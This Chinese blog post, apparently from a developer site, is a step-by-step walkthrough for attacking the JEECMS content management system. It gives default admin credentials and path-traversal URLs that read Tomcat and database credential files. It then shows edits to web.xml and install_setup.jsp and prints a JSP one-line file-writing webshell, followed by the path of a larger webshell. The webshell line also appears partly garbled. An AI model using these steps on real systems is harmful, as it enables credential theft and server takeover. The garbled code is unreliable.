JEECMS后台任意文件编辑漏洞及拿shell

JEECMS是基于java技术开发,继承其强大、稳定、安全、高效、跨平台等多方面的优点 · 采用SpringMVC3+Spring3+Hibernate3+Freemarker主流技术架构 安全性做得非常变态,当网站安装完成后就不再允许执行任何目录下的jsp文件了(web.xml配置了过滤器禁止了很多种动态脚本)。

 

 

2.x后台:
login/Jeecms.do
3.x后台:
jeeadmin/jeecms/index.do

默认账户:admin
默认密码:password

获取tomcat密码:
/jeeadmin/jeecms/template/v_edit.do?root=../../conf/&name=../../conf/tomcat-users.xml

获取JDBC数据库账号密码:
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2Fconfig%2F&name=%2FWEB-INF%2Fconfig%2Fjdbc.properties



JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../classes/jdbc.properties


 

修改web.xml取消对jsp的过滤:
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2F&name=%2FWEB-INF%2Fweb.xml



JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../web.xml

 

修改install/install_setup.jsp:
/jeeadmin/jeecms/template/v_edit.do?root=%2Finstall%2F&name=%2Finstall%2Finstall_setup.jsp


JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../../install\install_setup.jsp


 

插入Jsp一句话:
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("

("f"))).write(request.getParameter("t").getBytes());
%>

修改后的一句话目录
/install/install_setup.jsp

一句话连接成功后的jsp大马目录:
/ma.jsp

 

 

注:

1:2.X 在后台可以上传媒体格式为jsp的文件

2:web.xml修改后需要重启服务器(自动加载更新的除外)
3:本文由网络大学(doie.net)原创,转载请留名。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值